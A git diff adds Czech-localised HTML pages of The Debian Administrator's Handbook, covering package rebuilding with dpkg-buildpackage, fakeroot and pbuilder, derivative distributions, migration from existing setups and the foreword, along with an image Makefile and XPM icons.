+                class="emphasis"><em>autobuilder</em></span> to use a given package version during build, which is why Debian maintainers frequently use strictly versioned build-dependencies.
+			</div><div
+              class="para">
+				If you know for sure that these build-dependencies are too strict, you should feel free to relax them locally. Reading the files which document the standard way of building the software — these files are often called <code
+                class="filename">INSTALL</code> — will help you figure out the appropriate dependencies. Ideally, all dependencies should be satisfiable from the distribution used for the rebuild; if they are not, a recursive process starts, whereby the packages mentioned in the <code
+                class="literal">Build-Depends</code> field must be backported before the target package can be. Some packages may not need backporting, and can be installed as-is during the build process (a notable example is <span
+                class="pkg pkg">debhelper</span>). Note that the backporting process can quickly become complex if you are not careful. Therefore, backports should be kept to a strict minimum when possible.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Installing <code
+                          class="literal">Build-Depends</code></strong></p></div></div></div><a
+                id="id-1.18.4.4.7.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">apt-get</code> allows installing all packages mentioned in the <code
+                  class="literal">Build-Depends</code> fields of a source package available in a distribution mentioned in a <code
+                  class="literal">deb-src</code> line of the <code
+                  class="filename">/etc/apt/sources.list</code> file. This is a simple matter of running the <code
+                  class="command">apt-get build-dep <em
+                    class="replaceable">source-package</em></code> command.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.5"></a>15.1.3. Starting the Rebuild</h3></div></div></div><div
+              class="para">
+				When all the needed changes have been applied to the sources, we can start generating the actual binary package (<code
+                class="filename">.deb</code> file). The whole process is managed by the <code
+                class="command">dpkg-buildpackage</code> command.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.18.4.5.3"></a><p
+                class="title"><strong>Příklad 15.1. Rebuilding a package</strong></p><div
+                class="example-contents"><pre
+                  class="screen"><code
+                    class="computeroutput">$ </code><strong
+                    class="userinput"><code>dpkg-buildpackage -us -uc
+</code></strong><code
+                    class="computeroutput">[...]
+</code></pre></div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.fakeroot"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> <code
+                          class="command">fakeroot</code></strong></p></div></div></div><div
+                class="para">
+				In essence, the package creation process is a simple matter of gathering in an archive a set of existing (or built) files; most of the files will end up being owned by <span
+                  class="emphasis"><em>root</em></span> in the archive. However, building the whole package under this user would imply increased risks; fortunately, this can be avoided with the <code
+                  class="command">fakeroot</code> command. This tool can be used to run a program and give it the impression that it runs as <span
+                  class="emphasis"><em>root</em></span> and creates files with arbitrary ownership and permissions. When the program creates the archive that will become the Debian package, it is tricked into creating an archive containing files marked as belonging to arbitrary owners, including <span
+                  class="emphasis"><em>root</em></span>. This setup is so convenient that <code
+                  class="command">dpkg-buildpackage</code> uses <code
+                  class="command">fakeroot</code> by default when building packages.
+			</div><div
+                class="para">
+				Note that the program is only tricked into “believing” that it operates as a privileged account, and the process actually runs as the user running <code
+                  class="command">fakeroot <em
+                    class="replaceable">program</em></code> (and the files are actually created with that user's permissions). At no time does it actually get root privileges that it could abuse.
+			</div></div><div
+              class="para">
+				The previous command can fail if the <code
+                class="literal">Build-Depends</code> fields have not been updated, or if the related packages are not installed. In such a case, it is possible to overrule this check by passing the <code
+                class="literal">-d</code> option to <code
+                class="command">dpkg-buildpackage</code>. However, explicitly ignoring these dependencies runs the risk of the build process failing at a later stage. Worse, the package may seem to build correctly but fail to run properly: some programs automatically disable some of their features when a required library is not available at build time.
+			</div><div
+              class="para">
+				More often than not, Debian developers use a higher-level program such as <code
+                class="command">debuild</code>; this runs <code
+                class="command">dpkg-buildpackage</code> as usual, but it also adds an invocation of a program that runs many checks to validate the generated package against the Debian policy. This script also cleans up the environment so that local environment variables do not “pollute” the package build. The <code
+                class="command">debuild</code> command is one of the tools in the <span
+                class="emphasis"><em>devscripts</em></span> suite, which share some consistency and configuration to make the maintainers' task easier.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> <code
+                          class="command">pbuilder</code></strong></p></div></div></div><a
+                id="id-1.18.4.5.7.2"
+                class="indexterm"></a><div
+                class="para">
+				The <code
+                  class="command">pbuilder</code> program (in the similarly named package) allows building a Debian package in a <span
+                  class="emphasis"><em>chrooted</em></span> environment. It first creates a temporary directory containing the minimal system required for building the package (including the packages mentioned in the <span
+                  class="emphasis"><em>Build-Depends</em></span> field). This directory is then used as the root directory (<code
+                  class="filename">/</code>), using the <code
+                  class="command">chroot</code> command, during the build process.
+			</div><div
+                class="para">
+				This tool allows the build process to happen in an environment that is not altered by users' manipulations. This also allows for quick detection of the missing build-dependencies (since the build will fail unless the appropriate dependencies are documented). Finally, it allows building a package for a Debian version that is not the one used by the system as a whole: the machine can be using <span
+                  class="distribution distribution">Stable</span> for its normal workload, and a <code
+                  class="command">pbuilder</code> running on the same machine can be using <span
+                  class="distribution distribution">Unstable</span> for package builds.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dealing-with-compromised-machine.html"><strong>Předcházející</strong>14.7. Dealing with a Compromised Machine</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.building-first-package.html"><strong>Další</strong>15.2. Building your First Package</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html b/publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html
new file mode 100644
index 000000000..8bbd257e5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/derivative-distributions.html
@@ -0,0 +1,111 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha A. Derivative Distributions</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.future-of-this-book.html"
+        title="16.3. Future of this Book" /><link
+        rel="next"
+        href="sect.ubuntu.html"
+        title="A.2. Ubuntu" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/derivative-distributions.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-this-book.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ubuntu.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="derivative-distributions"></a>Příloha A. Derivative Distributions</h1></div></div></div><div
+          class="highlights"><div
+            class="para">
+		<a
+              id="id-1.20.3.1.1"
+              class="indexterm"></a> <a
+              id="id-1.20.3.1.2"
+              class="indexterm"></a> Many Linux distributions are derivatives of Debian and reuse Debian's package management tools. They all have their own interesting properties, and it is possible one of them will fulfill your needs better than Debian itself.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.derivative-census"></a>A.1. Census and Cooperation</h2></div></div></div><div
+            class="para">
+			The Debian project fully acknowledges the importance of derivative distributions and actively supports collaboration between all involved parties. This usually involves merging back the improvements initially developed by derivative distributions so that everyone can benefit and long-term maintenance work is reduced.
+		</div><div
+            class="para">
+			This explains why derivative distributions are invited to become involved in discussions on the <code
+              class="literal">debian-derivatives@lists.debian.org</code> mailing-list, and to participate in the derivative census. This census aims at collecting information on work happening in a derivative so that official Debian maintainers can better track the state of their package in Debian variants. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/DerivativesFrontDesk">https://wiki.debian.org/DerivativesFrontDesk</a></div><div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Derivatives/Census">https://wiki.debian.org/Derivatives/Census</a></div>
+		</div><div
+            class="para">
+			Let us now briefly describe the most interesting and popular derivative distributions.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-this-book.html"><strong>Předcházející</strong>16.3. Future of this Book</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ubuntu.html"><strong>Další</strong>A.2. Ubuntu</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html b/publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html
new file mode 100644
index 000000000..ba25fae78
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/existing-setup.html
@@ -0,0 +1,175 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 3. Analyzing the Existing Setup and Migrating</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Existing Setup, Reuse, Migration" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.why-debian-stable.html"
+        title="2.5. Why Debian Stretch?" /><link
+        rel="next"
+        href="sect.how-to-migrate.html"
+        title="3.2. How To Migrate" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/existing-setup.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian-stable.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.how-to-migrate.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="existing-setup"></a>Kapitola 3. Analyzing the Existing Setup and Migrating</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="existing-setup.html#sect.heterogeneous-environments">3.1. Coexistence in Heterogeneous Environments</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.4">3.1.1. Integration with Windows Machines</a></span></dt><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.5">3.1.2. Integration with OS X machines</a></span></dt><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.6">3.1.3. Integration with Other Linux/Unix Machines</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.how-to-migrate.html">3.2. How To Migrate</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.4">3.2.1. Survey and Identify Services</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.5">3.2.2. Backing up the Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.6">3.2.3. Taking Over an Existing Debian Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.7">3.2.4. Installing Debian</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.8">3.2.5. Installing and Configuring the Selected Services</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Any computer system overhaul should take the existing system into account. This allows reuse of available resources as much as possible and guarantees interoperability of the various elements comprising the system. This study will introduce a generic framework to follow in any migration of a computing infrastructure to Linux.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.heterogeneous-environments"></a>3.1. Coexistence in Heterogeneous Environments</h2></div></div></div><a
+            id="id-1.6.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Debian integrates very well in all types of existing environments and plays well with any other operating system. This near-perfect harmony comes from market pressure which demands that software publishers develop programs that follow standards. Compliance with standards allows administrators to switch out programs: clients or servers, whether free or not.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.4"></a>3.1.1. Integration with Windows Machines</h3></div></div></div><div
+              class="para">
+				Samba's SMB/CIFS support ensures excellent communication within a Windows context. It shares files and print queues to Windows clients and includes software that allow a Linux machine to use resources available on Windows servers.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> Samba</strong></p></div></div></div><a
+                id="id-1.6.4.4.3.2"
+                class="indexterm"></a><div
+                class="para">
+				The latest version of Samba can replace most of the Windows features: from those of a simple Windows NT server (authentication, files, print queues, downloading printer drivers, DFS, etc.) to the most advanced one (a domain controller compatible with Active Directory).
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.5"></a>3.1.2. Integration with OS X machines</h3></div></div></div><a
+              id="id-1.6.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.3"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.4"
+              class="indexterm"></a><div
+              class="para">
+				OS X machines provide, and are able to use, network services such as file servers and printer sharing. These services are published on the local network, which allows other machines to discover them and make use of them without any manual configuration, using the Bonjour implementation of the Zeroconf protocol suite. Debian includes another implementation, called Avahi, which provides the same functionality.
+			</div><a
+              id="id-1.6.4.5.6"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.7"
+              class="indexterm"></a><div
+              class="para">
+				In the other direction, the Netatalk daemon can be used to provide file servers to OS X machines on the network. It implements the AFP (AppleShare) protocol as well as the required notifications so that the servers can be autodiscovered by the OS X clients.
+			</div><a
+              id="id-1.6.4.5.9"
+              class="indexterm"></a><div
+              class="para">
+				Older Mac OS networks (before OS X) used a different protocol called AppleTalk. For environments involving machines using this protocol, Netatalk also provides the AppleTalk protocol (in fact, it started as a reimplementation of that protocol). It ensures the operation of the file server and print queues, as well as time server (clock synchronization). Its router function allows interconnection with AppleTalk networks.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.6"></a>3.1.3. Integration with Other Linux/Unix Machines</h3></div></div></div><div
+              class="para">
+				Finally, NFS and NIS, both included, guarantee interaction with Unix systems. NFS ensures file server functionality, while NIS creates user directories. The BSD printing layer, used by most Unix systems, also allows sharing of print queues.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.6.4.6.3"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/existing-setup-1.png"
+                    alt="Coexistence of Debian with OS X, Windows and Unix systems" /></div></div><p
+                class="title"><strong>Obrázek 3.1. Coexistence of Debian with OS X, Windows and Unix systems</strong></p></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian-stable.html"><strong>Předcházející</strong>2.5. Why Debian Stretch?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.how-to-migrate.html"><strong>Další</strong>3.2. How To Migrate</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html b/publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html
new file mode 100644
index 000000000..01ed8c1d4
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/foreword.html
@@ -0,0 +1,136 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Předmluva</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="preface.html"
+        title="Úvodní slovo" /><link
+        rel="next"
+        href="sect.who-is-this-book-for.html"
+        title="2. Pro koho je tato kniha?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/foreword.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="preface.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.who-is-this-book-for.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="preface"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="foreword"></a>Předmluva</h1></div></div></div><div
+          class="para">
+		Linux nabíral na síle po řadu let, a jeho rostoucí popularita pobízí více a více uživatelů, aby učinili tento skok. Prvním krokem na této cestě je vybrat distribuci. To je důležité rozhodnutí, protože každá distribuce má své vlastní zvláštnosti, a budoucím nákladům na migraci se lze vyhnout, pokud je učiněna správná volba již od začátku.
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Linuxová distribuce, linuxové jádro</strong></p></div></div></div><a
+            id="id-1.3.3.2"
+            class="indexterm"></a><a
+            id="id-1.3.3.3"
+            class="indexterm"></a><a
+            id="id-1.3.3.4"
+            class="indexterm"></a><div
+            class="para">
+		Striktně vzato, Linux je pouze jádro, jádro je kus softwaru, který sídlí mezi hardwarem a aplikací.
+	</div><div
+            class="para">
+		“Linuxová distribuce” je úplný operační systém; To obvykle zahrnuje linuxové jádro, instalační program, a co je nejdůležitější aplikace a další software potřebný k proměně počítače na skutečně užitečný nástroj.
+	</div></div><div
+          class="para">
+		Debian GNU/Linux je “typická” linuxová distribuce, která se hodí pro většinu uživatelů. Účelem této knihy je ukázat mnoho jejích aspektů, aby jste mohli učinit rozhodnutí založené na co nejvíce informacích.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.why-this-book"></a>1. Proč tato kniha?</h2></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Komerční distribuce</strong></p></div></div></div><a
+              id="id-1.3.5.2.2"
+              class="indexterm"></a><div
+              class="para">
+			Most Linux distributions are backed by a for-profit company that develops them and sells them under some kind of commercial scheme. Examples include <span
+                class="emphasis"><em>Ubuntu</em></span>, mainly developed by <span
+                class="emphasis"><em>Canonical Ltd.</em></span>; <span
+                class="emphasis"><em>Red Hat Enterprise Linux</em></span>, by <span
+                class="emphasis"><em>Red Hat</em></span>; and <span
+                class="emphasis"><em>SUSE Linux</em></span>, maintained and made commercially available by <span
+                class="emphasis"><em>Novell</em></span>.
+		</div><div
+              class="para">
+			Na druhém konci spektra leží podoby Debianu a Apache Software Foundation (který zabezpečuje vývoj pro webový server Apache). Debian je především projekt ve světě svobodného softwaru, implementovaný dobrovolníky, kteří spolupracují prostřednictvím internetu. Zatímco někteří z nich pracují na Debianu jako na součásti své placené práce v různých společnostech, projekt jako celek není nijak zvlášť spojen s žádnou společností a ani žádná společnost nemá v projektu větší slovo než co mají dobrovolní přispěvatelé.
+		</div></div><div
+            class="para">
+			Linux has gathered a fair amount of media coverage over the years; it mostly benefits the distributions supported by a real marketing department — in other words, company-backed distributions (Ubuntu, Red Hat, SUSE, and so on). But Debian is far from being a marginal distribution; multiple studies have shown over the years that it is widely used both on servers and on desktops. This is particularly true among webservers where Debian and Ubuntu are the leading Linux distributions. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://w3techs.com/technologies/details/os-debian/all/all">https://w3techs.com/technologies/details/os-debian/all/all</a></div>
+		</div><div
+            class="para">
+			Účelem této knihy je pomoci vám poznat tuto distribuci. Doufáme, že se nám podaří sdílet zkušenosti, které jsme nashromáždili od doby, kdy jsme se připojili k projektu jako vývojáři a přispěvatelé v roce 1998 (Raphaël) a v roce 2000 (Roland). S trochou štěstí bude naše nadšení nakažlivé a možná se k nám někdy připojíte...
+		</div><div
+            class="para">
+			První vydání této knihy (v roce 2004) sloužilo k vyplnění mezery: byla to první kniha ve francouzském jazyce, která se zaměřila výhradně na Debian. V té době, mnoho dalších knih bylo napsáno na toto téma jak pro francouzsky mluvící, tak i pro anglicky mluvící čtenáře. Bohužel téměř žádné z nich se nedostávalo aktualizací, a v průběhu let situace sklouzla zpět do pozice, kdy bylo o Debianu jen velmi málo dobrých knih. Doufáme, že tato kniha, která začala svůj nový život překladem do angličtiny (a několika překlady z angličtiny do různých jiných jazyků), zaplní tuto mezeru a pomůže mnoha uživatelům.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="preface.html"><strong>Předcházející</strong>Úvodní slovo</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.who-is-this-book-for.html"><strong>Další</strong>2. Pro koho je tato kniha?</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/Makefile b/publish/cs-CZ/Debian/9/html/debian-handbook/images/Makefile
new file mode 100644
index 000000000..112420b8b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/Makefile
@@ -0,0 +1,17 @@
+
+dia = $(wildcard *.dia)
+
+all: png
+
+png: $(patsubst %.dia,%.png,$(dia))
+
+eps: $(patsubst %.jpg,%.eps,$(wildcard *.jpg)) $(patsubst %.png,%.eps,$(wildcard *.png)) $(patsubst %.dia,%.eps,$(dia))
+
+define DIA_template
+$(1).png: $(1).dia
+	dia -t png -s 1024 $$<
+endef
+
+$(foreach d,$(patsubst %.dia,%,$(dia)),$(eval $(call DIA_template,$(d))))
+
+.PHONY: png all
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/apple.xpm b/publish/cs-CZ/Debian/9/html/debian-handbook/images/apple.xpm
new file mode 100644
index 000000000..bd976feb5
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/apple.xpm
@@ -0,0 +1,34 @@
+/* XPM */
+static char * apple_xpm[] = {
+"28 24 7 1",
+" 	c #ff9ebe",
+".	c #3c9e3c",
+"X	c #ffff00",
+"o	c #ffbe7d",
+"O	c #ff0000",
+"+	c #7d3cbe",
+"@	c #0000ff",
+"               ....         ",
+"              ....          ",
+"              ....          ",
+"              ...           ",
+"        ..    .   ..        ",
+"      ......    ......      ",
+"     ..................     ",
+"     ..................     ",
+"    XXXXXXXXXXXXXXXXX       ",
+"    XXXXXXXXXXXXXXXX        ",
+"    XXXXXXXXXXXXXXXX        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    OOOOOOOOOOOOOOOOO       ",
+"     OOOOOOOOOOOOOOOOO      ",
+"     OOOOOOOOOOOOOOOOOO     ",
+"     +++++++++++++++++      ",
+"      ++++++++++++++++      ",
+"      +++++++++++++++       ",
+"       @@@@@@@@@@@@@@       ",
+"        @@@@@@@@@@@@        ",
+"          @@    @@          ",
+"                            "};
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/aptitude.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/aptitude.png
new file mode 100644
index 000000000..f9cfb9efe
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/aptitude.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.dia b/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.dia
new file mode 100644
index 000000000..2fa55396c
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.dia differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.png b/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.png
new file mode 100644
index 000000000..575ef330d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/images/autobuilder.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/images/bsdcpu.xpm b/publish/cs-CZ/Debian/9/html/debian-handbook/images/bsdcpu.xpm
new file mode 100644
index 000000000..832b780bc
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/images/bsdcpu.xpm
@@ -0,0 +1,60 @@
+/* XPM */
+static char * bsdcpu_xpm[] = {
+"55 45 11 1",
+"      c #888888",
+".     c None",
+"X     c #cccccc",
+"o     c #bbbbbb",
+"O     c #000000",
+"+     c #eeeeee",
+"@     c #cd5c5c",
+"#     c #32cd32",
+"$     c #999999",
+"%     c #666666",
+"&     c #555555",
+"                                    ...................",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ...................",
+" XooooooooooooooooooooooooooooooooX ...................",
+" Xo                              oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX .....          ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@@+###+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@O+##O+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
